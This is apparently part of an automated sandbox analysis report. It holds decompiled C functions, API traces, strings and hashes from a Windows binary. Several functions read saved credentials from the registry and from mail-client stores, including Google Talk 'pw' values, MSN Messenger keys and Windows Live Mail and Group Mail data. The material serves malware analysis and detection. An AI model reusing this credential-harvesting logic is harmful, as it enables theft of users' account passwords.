0x00410e3b
0x00410e48
0x00410e48
0x00410e53

APIs

memset.MSVCRT ref: 00410D3C

Part of subcall function 00406734: strlen.MSVCRT ref: 00406736
Part of subcall function 00406734: strlen.MSVCRT ref: 00406741
Part of subcall function 00406734: strcat.MSVCRT(00000000,dA,0000001C,00410D64,\Microsoft\Windows Mail,?,?,?), ref: 00406758

Part of subcall function 0040EE59: memset.MSVCRT ref: 0040EEAE
Part of subcall function 0040EE59: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040EF17
Part of subcall function 0040EE59: strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040EF25

memset.MSVCRT ref: 00410DAA
memset.MSVCRT ref: 00410DC5

Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA

ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 00410DFE
strlen.MSVCRT ref: 00410E0C
_stricmp.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?,?), ref: 00410E32

Strings

\Microsoft\Windows Mail, xrefs: 00410D5A
\Microsoft\Windows Live Mail, xrefs: 00410D81
Store Root, xrefs: 00410DD6
Software\Microsoft\Windows Live Mail, xrefs: 00410DDB

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memset$strlen$Close$EnvironmentExpandStrings_stricmpstrcatstrcpy
String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
API String ID: 4071991895-2578778931
Opcode ID: 446d342accadaa8f5357ef9c7141ad4d55f165afb8774a5b515e9d11a0344459
Instruction ID: 656a87abbde68b626b6b67706479efffa51c3f1aad4b8967eb2d69b922da332e
Opcode Fuzzy Hash: 446d342accadaa8f5357ef9c7141ad4d55f165afb8774a5b515e9d11a0344459
Instruction Fuzzy Hash: 3D318DB2548348ABD324E799DC46FCB77DC9BC4318F04482FF649D7182E678D68487AA

Uniqueness

Uniqueness Score: -1.00%

Function 004037B1, Relevance: 12.1, APIs: 7, Strings: 1, Instructions: 86
stringCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E004037B1(void* __ecx, void* __edi, void* __fp0, intOrPtr _a4) {
				char _v276;
				char _v404;
				intOrPtr _v408;
				char _v792;
				intOrPtr _v796;
				char _v924;
				char _v936;
				void _v1959;
				char _v1960;
				void _v2983;
				char _v2984;
				void* __ebx;
				void* __esi;
				void* _t28;
				void* _t50;
				void* _t51;
				char* _t59;
				char* _t63;
				void* _t70;

				_t70 = __fp0;
				_t51 = __ecx;
				_v1960 = 0;
				memset( &_v1959, 0, 0x3ff);
				_v2984 = 0;
				memset( &_v2983, 0, 0x3ff);
				_t28 = E00410F79(_t51,  &_v2984,  &_v1960); // executed
				if(_t28 == 0) {
					return _t28;
				}
				E004021D8( &_v936);
				_push( &_v1960);
				_t50 = 0x7f;
				E004060D0(_t50,  &_v276);
				_t59 =  &_v404;
				E004060D0(_t50, _t59,  &_v2984);
				_v796 = 9;
				_v408 = 3;
				_t63 = strchr(_t59, 0x40);
				_push( &_v404);
				if(_t63 == 0) {
					if(strlen() + 0xa < 0) {
						sprintf( &_v792, "%s@yahoo.com",  &_v404);
					}
				} else {
					strcpy( &_v792, ??);
					 *_t63 = 0;
				}
				strcpy( &_v924,  &_v404);
				return E00402407( &_v936, _t70, _a4);
			}

0x004037b1
0x004037b1
0x004037cc
0x004037d2
0x004037e0
0x004037e6
0x004037fc
0x00403803
0x004038cc
0x004038cc
0x00403810
0x0040381b
0x0040381e
0x00403825
0x00403831
0x00403837
0x00403841
0x0040384b
0x0040385d
0x00403868
0x00403869
0x00403889
0x0040389e
0x004038a3
0x0040386b
0x00403872
0x00403879
0x00403879
0x004038b4
0x00000000

APIs

memset.MSVCRT ref: 004037D2
memset.MSVCRT ref: 004037E6

Part of subcall function 00410F79: memset.MSVCRT ref: 00410F9B
Part of subcall function 00410F79: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00411007

Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA

strchr.MSVCRT ref: 00403855
strcpy.MSVCRT(?,?,?,?,?), ref: 00403872
strlen.MSVCRT ref: 0040387E
sprintf.MSVCRT ref: 0040389E
strcpy.MSVCRT(?,?,?,?,?), ref: 004038B4

Strings

%s@yahoo.com, xrefs: 00403898

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memset$strcpystrlen$Closememcpysprintfstrchr
String ID: %s@yahoo.com
API String ID: 1649821605-3288273942
Opcode ID: d756cc4bb234ca8bd2adb7c792dfa1259f1477984d05252a8ea6bc4bb60e6678
Instruction ID: 59c64947ec9ad5e5fa7ad27033647646f0aae9e06f6053b7dc62ef58ab254070
Opcode Fuzzy Hash: d756cc4bb234ca8bd2adb7c792dfa1259f1477984d05252a8ea6bc4bb60e6678
Instruction Fuzzy Hash: 592184B3D0412C6EDB21EB55DD41FDA77AC9F85308F0404EBB64DE6041E6B8AB848BA5

Uniqueness

Uniqueness Score: -1.00%

Function 004034CB, Relevance: 10.5, APIs: 4, Strings: 3, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004034CB(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4) {
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void* __edi;
				void* __esi;
				void* _t15;
				void* _t23;
				char* _t28;

				_t23 = __ecx;
				_v532 = 0;
				memset( &_v531, 0, 0x104);
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t15 = E0040EBC1(_t23, 0x80000002, "Software\\Group Mail", "InstallPath",  &_v532, 0xfa); // executed
				if(_t15 != 0) {
					strcpy( &_v268,  &_v532);
					_t28 =  &_v268;
					E00405F1F(_t28);
					strcat(_t28, "fb.dat");
					return E004033D7(_t28, __fp0, _a4);
				}
				return _t15;
			}

0x004034cb
0x004034e4
0x004034eb
0x004034fa
0x00403501
0x00403521
0x0040352b
0x0040353c
0x00403541
0x00403547
0x00403554
0x00000000
0x00403566
0x00403569

APIs

memset.MSVCRT ref: 004034EB
memset.MSVCRT ref: 00403501

Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA

strcpy.MSVCRT(00000000,00000000), ref: 0040353C

Part of subcall function 00405F1F: strlen.MSVCRT ref: 00405F20
Part of subcall function 00405F1F: strcat.MSVCRT(00000000,00413044,004062BF,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 00405F37

strcat.MSVCRT(00000000,fb.dat,00000000,00000000), ref: 00403554

Strings

fb.dat, xrefs: 0040354E
Software\Group Mail, xrefs: 00403517
InstallPath, xrefs: 00403512

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memsetstrcat$Closestrcpystrlen
String ID: InstallPath$Software\Group Mail$fb.dat
API String ID: 1387626053-966475738
Opcode ID: b4206de9c90982f9c66f6cfc9dc9c0c880768121677d473e1c5bd2e45b33c8fe
Instruction ID: 7ff2b4ee0b8a45595852750e2855a272ac8b2b1e575441dca18af6517dfb7442
Opcode Fuzzy Hash: b4206de9c90982f9c66f6cfc9dc9c0c880768121677d473e1c5bd2e45b33c8fe
Instruction Fuzzy Hash: 2E01FC72D8012C75D720E6669C46FDA766C8F64745F0004A6BA4AF20C2DAFCABD48B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040754D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79
registryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040754D(void* __ecx, void* __eflags, int _a4, char _a8, char _a12, void _a13, char _a268, void _a269) {
				void* _v0;
				char _v4;
				long _t29;
				void* _t33;
				void* _t36;
				signed int _t54;
				void* _t56;
				void* _t57;
				void* _t58;

				_t50 = __ecx;
				E004118A0(0x1110, __ecx);
				E0040724C(_a4); // executed
				_t29 = E0040EB3F(0x80000001, "Software\\Google\\Google Talk\\Accounts",  &_v4);
				_t56 = (_t54 & 0xfffffff8) + 0xc;
				if(_t29 == 0) {
					_a4 = 0;
					_a12 = 0;
					memset( &_a13, 0, 0xff);
					_t57 = _t56 + 0xc;
					_t33 = E0040EC05(_v0, 0,  &_a12);
					while(1) {
						_t58 = _t57 + 0xc;
						if(_t33 != 0) {
							break;
						}
						_t36 = E0040EB3F(_v0,  &_a12,  &_a8);
						_t57 = _t58 + 0xc;
						if(_t36 == 0) {
							_a268 = 0;
							memset( &_a269, 0, 0xfff);
							E0040EB80(0xfff, _t50, _a8, "pw",  &_a268);
							_t57 = _t57 + 0x18;
							E00407406( &_a268, _a4,  &_a12);
							RegCloseKey(_v0);
						}
						_a4 = _a4 + 1;
						_t33 = E0040EC05(_v0, _a4,  &_a12);
					}
					_t29 = RegCloseKey(_v0);
				}
				return _t29;
			}

0x0040754d
0x00407558
0x00407562
0x00407576
0x0040757b
0x00407580
0x00407593
0x00407597
0x0040759b
0x004075a0
0x004075ad
0x00407642
0x00407642
0x00407647
0x00000000
0x00000000
0x004075cb
0x004075d0
0x004075d5
0x004075e5
0x004075ec
0x0040760a
0x0040760f
0x00407621
0x0040762a
0x0040762a
0x0040762c
0x0040763d
0x0040763d
0x00407651
0x00407651
0x00407658

APIs

Part of subcall function 0040724C: memset.MSVCRT ref: 004072AE
Part of subcall function 0040724C: memset.MSVCRT ref: 004072C2
Part of subcall function 0040724C: memset.MSVCRT ref: 004072DC
Part of subcall function 0040724C: memset.MSVCRT ref: 004072F1
Part of subcall function 0040724C: GetComputerNameA.KERNEL32 ref: 00407313
Part of subcall function 0040724C: GetUserNameA.ADVAPI32(?,?), ref: 00407327
Part of subcall function 0040724C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407346
Part of subcall function 0040724C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040735B
Part of subcall function 0040724C: strlen.MSVCRT ref: 00407364
Part of subcall function 0040724C: strlen.MSVCRT ref: 00407373
Part of subcall function 0040724C: memcpy.MSVCRT ref: 00407385

Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52

memset.MSVCRT ref: 0040759B

Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28

memset.MSVCRT ref: 004075EC
RegCloseKey.ADVAPI32(?,?,?), ref: 0040762A
RegCloseKey.ADVAPI32(?), ref: 00407651

Strings

Software\Google\Google Talk\Accounts, xrefs: 0040756C

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
String ID: Software\Google\Google Talk\Accounts
API String ID: 2959138223-1079885057
Opcode ID: a9382395aa04bc6a2dd49f4cc28a46152cbaa1b62cfbf9a84d5181dec9838710
Instruction ID: 125b9810afc719f5725a34431a69a8fbc80fc1372edd2e7206a69bc0ee1a9f38
Opcode Fuzzy Hash: a9382395aa04bc6a2dd49f4cc28a46152cbaa1b62cfbf9a84d5181dec9838710
Instruction Fuzzy Hash: 6A21887150820A6FD610EF51DC42DEBB7ECDF94344F00083AF945E1191E635D96D9BA7

Uniqueness

Uniqueness Score: -1.00%

Function 0040A5AC, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040A5AC(void* __eax) {
				void* __esi;
				_Unknown_base(*)()* _t26;
				void* _t31;
				intOrPtr _t34;
				char* _t44;
				void* _t45;
				intOrPtr* _t46;
				int _t47;

				_t45 = __eax;
				_t37 =  *((intOrPtr*)(__eax + 0x37c));
				_t47 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x37c)) + 0x30)) > 0) {
					do {
						_t31 = E00406DEB(_t47, _t37);
						_push(_t31);
						_push("/sort");
						L004115C4();
						if(_t31 == 0) {
							_t4 = _t47 + 1; // 0x1
							_t44 = E00406DEB(_t4,  *((intOrPtr*)(_t45 + 0x37c)));
							_t54 =  *_t44 - 0x7e;
							_t34 =  *((intOrPtr*)(_t45 + 0x370));
							if( *_t44 != 0x7e) {
								_push(0);
							} else {
								_push(1);
								_t44 = _t44 + 1;
							}
							_push(_t44);
							E0040A119(_t34, _t54);
						}
						_t37 =  *((intOrPtr*)(_t45 + 0x37c));
						_t47 = _t47 + 1;
					} while (_t47 <  *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x37c)) + 0x30)));
				}
				E00405E2C();
				 *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)) + 0x28)) = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)))) + 0x5c))();
				if(E00406DFB( *((intOrPtr*)(_t45 + 0x37c)), "/nosort") == 0xffffffff) {
					_t46 =  *((intOrPtr*)(_t45 + 0x370));
					if( *0x41748c == 0) {
						 *0x417490 =  *((intOrPtr*)(_t46 + 0x1ac));
						 *0x41748c = 1;
					}
					_t26 =  *((intOrPtr*)( *_t46 + 0x60))(E0040A0F3);
					qsort( *((intOrPtr*)( *_t46 + 0x64))(), 0,  *(_t46 + 0x28), _t26);
				}
				return SetCursor( *0x416b98);
			}

0x0040a5af
0x0040a5b1
0x0040a5b9
0x0040a5be
0x0040a5c0
0x0040a5c2
0x0040a5c7
0x0040a5c8
0x0040a5cd
0x0040a5d6
0x0040a5de
0x0040a5e6
0x0040a5e8
0x0040a5eb
0x0040a5f1
0x0040a5f8
0x0040a5f3
0x0040a5f3
0x0040a5f5
0x0040a5f5
0x0040a5f9
0x0040a5fa
0x0040a5fa
0x0040a5ff
0x0040a605
0x0040a606
0x0040a5c0
0x0040a60b
0x0040a616
0x0040a621
0x0040a637
0x0040a63f
0x0040a645
0x0040a64d
0x0040a652
0x0040a652
0x0040a668
0x0040a676
0x0040a67b
0x0040a68d

APIs

_mbsicmp.MSVCRT ref: 0040A5CD
qsort.MSVCRT ref: 0040A676
SetCursor.USER32(/nosort,?,0040BAC6), ref: 0040A684

Strings

/sort, xrefs: 0040A5C8
/nosort, xrefs: 0040A62A

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Cursor_mbsicmpqsort
String ID: /nosort$/sort
API String ID: 882979914-1578091866
Opcode ID: 37bac6c9d6653dd70bdeecbb298df2510de2a0ce3a9ae5c3ad425128252b2c66
Instruction ID: 1813cf3d9500be1981e9bba0c11058464626672cad6922460886ab76c06e8bc1
Opcode Fuzzy Hash: 37bac6c9d6653dd70bdeecbb298df2510de2a0ce3a9ae5c3ad425128252b2c66
Instruction Fuzzy Hash: 4921B071304601EFC719AF75C880A99B7A9BF08314B10017EF429A7291CB39A9628B8A

Uniqueness

Uniqueness Score: -1.00%

Function 0040EE59, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E0040EE59(char* __edi, void* __esi) {
				void* _v8;
				char _v40;
				void _v299;
				char _v300;
				void* _t32;
				char* _t37;
				void* _t38;

				_t38 = __esi;
				_t37 = __edi;
				E0040EDAC();
				if( *0x41751c == 0 ||  *((intOrPtr*)(E00406278() + 0x10)) == 1 && (__esi == 0x19 || __esi == 0x17 || __esi == 0x16)) {
					_v300 = 0;
					memset( &_v299, 0, 0x103);
					if(_t38 == 0x19 || _t38 == 0x17 || _t38 == 0x16) {
						_push( &_v8);
						_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
						_push(0x80000002);
					} else {
						_push( &_v8);
						_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
						_push(0x80000001);
					}
					if(E0040EB3F() == 0) {
						E0040EDDB(_t38);
						E0040EB80(0x104,  &_v40, _v8,  &_v40,  &_v300);
						RegCloseKey(_v8);
					}
					strcpy(_t37,  &_v300);
					return 0 |  *_t37 != 0x00000000;
				} else {
					_t32 =  *0x41751c(0, _t37, _t38, 0); // executed
					return _t32;
				}
			}

0x0040ee59
0x0040ee59
0x0040ee63
0x0040ee70
0x0040eea8
0x0040eeae
0x0040eeb9
0x0040eec8
0x0040eec9
0x0040eece
0x0040eed5
0x0040eed8
0x0040eed9
0x0040eede
0x0040eede
0x0040eeed
0x0040eef4
0x0040ef0c
0x0040ef17
0x0040ef17
0x0040ef25
0x00000000
0x0040ee8c
0x0040ee90
0x00000000
0x0040ee90

APIs

Part of subcall function 0040EDAC: LoadLibraryA.KERNEL32(shell32.dll,0040B9D8,74784DE0,?,00000000), ref: 0040EDBA
Part of subcall function 0040EDAC: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040EDCF

memset.MSVCRT ref: 0040EEAE
RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040EF17
strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040EF25

Part of subcall function 00406278: GetVersionExA.KERNEL32(00417118,0000001A,0040EE77,00000104), ref: 00406292

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040EEC9, 0040EED9

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressCloseLibraryLoadProcVersionmemsetstrcpy
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
API String ID: 181880968-2036018995
Opcode ID: f36eb23c2dc7077338fc74569912d0170d623695a7104f0b3b9fc9f5b09292aa
Instruction ID: b4f7ca4f0d473bdd6f3573a0ab4a655380742daec172f7a18688454dd959f7ad
Opcode Fuzzy Hash: f36eb23c2dc7077338fc74569912d0170d623695a7104f0b3b9fc9f5b09292aa
Instruction Fuzzy Hash: D711D871800219FADB24A656DC89DEF77BCDB04309F1008B7F91572191D63D9FA886DD

Uniqueness

Uniqueness Score: -1.00%

Function 0040396C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040396C(void* __eflags, void* __fp0, intOrPtr _a4) {
				char _v528;
				intOrPtr _v540;
				char _v796;
				char _v1052;
				void* _v1056;
				void* _v1060;
				int _v1064;
				void* __ebx;
				void* __esi;
				void* _t21;
				long _t23;
				void** _t24;
				long _t26;
				int _t32;
				void* _t52;

				_t52 = __fp0;
				_v540 = 0x412e80;
				E004046D7( &_v528);
				_t32 = 0;
				_v1052 = 0;
				_v796 = 0;
				_v1064 = 0;
				do {
					if(_v1064 != _t32) {
						__eflags = _v1064 - 1;
						if(__eflags != 0) {
							_t21 = E0040D5DB( &_v1052, __eflags); // executed
						} else {
							_t23 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MessengerService", _t32, 0x20019,  &_v1060); // executed
							__eflags = _t23;
							if(_t23 != 0) {
								goto L5;
							} else {
								_t24 =  &_v1060;
								goto L4;
							}
						}
					} else {
						_t26 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MSNMessenger", _t32, 0x20019,  &_v1056); // executed
						if(_t26 != 0) {
							L5:
							_t21 = 0;
						} else {
							_t24 =  &_v1056;
							L4:
							_t21 = E0040D4A6( &_v1052, _t24);
						}
					}
					_t32 = 0;
					if(_t21 != 0) {
						E004038CF(_t52, _a4,  &_v1052);
					}
					_v1064 = _v1064 + 1;
				} while (_v1064 <= 2);
				return E004047F1( &_v528);
			}

0x0040396c
0x00403982
0x0040398d
0x00403998
0x0040399a
0x0040399e
0x004039a5
0x004039ae
0x004039b2
0x004039df
0x004039e4
0x00403a07
0x004039e6
0x004039f7
0x004039f9
0x004039fb
0x00000000
0x004039fd
0x004039fd
0x00000000
0x004039fd
0x004039fb
0x004039b4
0x004039c5
0x004039c9
0x004039db
0x004039db
0x004039cb
0x004039cb
0x004039cf
0x004039d4
0x004039d4
0x004039c9
0x00403a0c
0x00403a10
0x00403a1a
0x00403a1a
0x00403a1f
0x00403a23
0x00403a3c

APIs

Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726

RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MSNMessenger,00000000,00020019,?), ref: 004039C5

Part of subcall function 0040D5DB: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040D6A7
Part of subcall function 0040D5DB: strlen.MSVCRT ref: 0040D6B7
Part of subcall function 0040D5DB: strcpy.MSVCRT(?,?), ref: 0040D6C8
Part of subcall function 0040D5DB: LocalFree.KERNEL32(?), ref: 0040D6D5

RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 004039F7

Strings

Software\Microsoft\MessengerService, xrefs: 004039F1
Software\Microsoft\MSNMessenger, xrefs: 004039BF

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Openstrcpy$ByteCharFreeLocalMultiWidestrlen
String ID: Software\Microsoft\MSNMessenger$Software\Microsoft\MessengerService
API String ID: 1910562259-1741179510
Opcode ID: a042053f0881545de1053e7963e322542f87d6f2c27a3a690180a3307b8871c0
Instruction ID: e1373b66f94ab8684edf5be4eb08dc620599410c0cc400d8dd4f2e2a864aae35
Opcode Fuzzy Hash: a042053f0881545de1053e7963e322542f87d6f2c27a3a690180a3307b8871c0
Instruction Fuzzy Hash: 4F11F6B1608345AEC320DF5188819ABBBEC9B84355F50893FF584A2081D338DA09CAAB

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA72, Relevance: 6.1, APIs: 4, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040EA72(void* __ecx, intOrPtr* __edi, void* __eflags, intOrPtr _a4, CHAR* _a8, CHAR* _a12, intOrPtr _a16, CHAR* _a20) {
				void _v8199;
				char _v8200;
				void* __ebx;
				int _t23;
				CHAR* _t31;

				E004118A0(0x2004, __ecx);
				_v8200 = 0;
				if(_a4 == 0) {
					memset( &_v8199, 0, 0x2000);
					GetPrivateProfileStringA(_a8, _a12, 0x412466,  &_v8200, 0x2000, _a20); // executed
					_t23 = E004067DC( &_v8200, __edi, _a16);
				} else {
					memset( &_v8199, 0, 0x2000);
					_t31 =  &_v8200;
					E00406763(_t31, _a16,  *__edi);
					_t23 = WritePrivateProfileStringA(_a8, _a12, _t31, _a20);
				}
				return _t23;
			}

0x0040ea7a
0x0040ea85
0x0040ea8b
0x0040ead5
0x0040eaf3
0x0040eb03
0x0040ea8d
0x0040ea9a
0x0040eaa1
0x0040eaaa
0x0040eabe
0x0040eabe
0x0040eb0d

APIs

memset.MSVCRT ref: 0040EA9A

Part of subcall function 00406763: sprintf.MSVCRT ref: 0040679B
Part of subcall function 00406763: memcpy.MSVCRT ref: 004067AE

WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0040EABE
memset.MSVCRT ref: 0040EAD5
GetPrivateProfileStringA.KERNEL32(?,?,Function_00012466,?,00002000,?), ref: 0040EAF3

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: PrivateProfileStringmemset$Writememcpysprintf
String ID:
API String ID: 3143880245-0
Opcode ID: 55a900beb3324ae435e234628281be75478a67a5b39370e1d0f1c50bd7ccf1f7
Instruction ID: dd976746f5256500085d4a95e5c89bc7782f2e7a6919953fe2ebae93c0a04965
Opcode Fuzzy Hash: 55a900beb3324ae435e234628281be75478a67a5b39370e1d0f1c50bd7ccf1f7
Instruction Fuzzy Hash: 6F01A172800219BFEF12AF51DC89DDB3B79EF04344F0044A6B609A2062D6359A64CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040B785, Relevance: 6.1, APIs: 4, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040B785(intOrPtr __eax, intOrPtr* __ebx) {
				void* __edi;
				void* __esi;
				intOrPtr _t14;
				intOrPtr _t15;
				void* _t16;
				void* _t17;
				struct HICON__* _t19;
				intOrPtr* _t23;
				void* _t25;

				_t23 = __ebx;
				_t14 = __eax;
				 *((intOrPtr*)(__ebx + 0x124)) = 0;
				 *__ebx = 0x41356c;
				 *((intOrPtr*)(__ebx + 0x258)) = 0;
				_push(0x14);
				 *((intOrPtr*)(__ebx + 0x374)) = 0;
				L004115D0();
				if(__eax == 0) {
					_t14 = 0;
					__eflags = 0;
				} else {
					 *0x417114 = __eax;
				}
				 *((intOrPtr*)(_t23 + 0x36c)) = _t14;
				L004115D0(); // executed
				_t32 = _t14;
				_t25 = 0xf38;
				if(_t14 == 0) {
					_t15 = 0;
					__eflags = 0;
				} else {
					_t15 = E00404016(_t14, _t32);
				}
				 *((intOrPtr*)(_t23 + 0x370)) = _t15;
				 *((intOrPtr*)(_t23 + 0x378)) = 0;
				 *((intOrPtr*)(_t23 + 0x260)) = 0;
				 *((intOrPtr*)(_t23 + 0x25c)) = 0;
				 *((intOrPtr*)(_t23 + 0x154)) = 0;
				_t16 =  *(_t23 + 0x258);
				if(_t16 != 0) {
					DeleteObject(_t16);
					 *(_t23 + 0x258) = 0;
				}
				_t17 = E00406252(); // executed
				 *(_t23 + 0x258) = _t17;
				E00401000(_t25, _t23 + 0x158, 0x413480);
				_t19 = LoadIconA( *0x416b94, 0x65); // executed
				E004017A4(_t23, _t19);
				return _t23;
			}

0x0040b785
0x0040b785
0x0040b789
0x0040b78f
0x0040b795
0x0040b79b
0x0040b79d
0x0040b7a3
0x0040b7ab
0x0040b7b4
0x0040b7b4
0x0040b7ad
0x0040b7ad
0x0040b7ad
0x0040b7bb
0x0040b7c1
0x0040b7c6
0x0040b7c8
0x0040b7c9
0x0040b7d4
0x0040b7d4
0x0040b7cb
0x0040b7cd
0x0040b7cd
0x0040b7d6
0x0040b7dc
0x0040b7e2
0x0040b7e8
0x0040b7ee
0x0040b7f4
0x0040b7fc
0x0040b7ff
0x0040b805
0x0040b805
0x0040b80b
0x0040b81b
0x0040b821
0x0040b82e
0x0040b837
0x0040b840

APIs

??2@YAPAXI@Z.MSVCRT ref: 0040B7A3
??2@YAPAXI@Z.MSVCRT ref: 0040B7C1
DeleteObject.GDI32(?), ref: 0040B7FF
LoadIconA.USER32(00000065,00000000), ref: 0040B82E

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ??2@$DeleteIconLoadObject
String ID:
API String ID: 1986663749-0
Opcode ID: 0423a71d4927b18fd553b5e50ae37bff09cbbc21581d25ca9f1141fabe86d1e7
Instruction ID: 38da8263615bef274e7c21802c355ecfe582676222a25676d72b73c1d19d8401
Opcode Fuzzy Hash: 0423a71d4927b18fd553b5e50ae37bff09cbbc21581d25ca9f1141fabe86d1e7
Instruction Fuzzy Hash: 8C1151B09056509BCF519F259C887C53BA4EB84B41F1804BBFD08EF3A6DBB845418BAC

Uniqueness

Uniqueness Score: -1.00%

Function 004060FA, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060FA(signed int* __eax, void* __edx, void** __edi, signed int _a4, intOrPtr _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						 *__eax =  *__eax + _a8;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13);
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}

0x004060fa
0x004060fb
0x004060ff
0x0040614a
0x00406101
0x00406102
0x00406104
0x00406108
0x0040610a
0x0040610c
0x00406116
0x0040611e
0x00406120
0x00406124
0x0040612e
0x00406133
0x00406137
0x0040613c
0x00406146
0x00406146

APIs

malloc.MSVCRT ref: 00406116
memcpy.MSVCRT ref: 0040612E
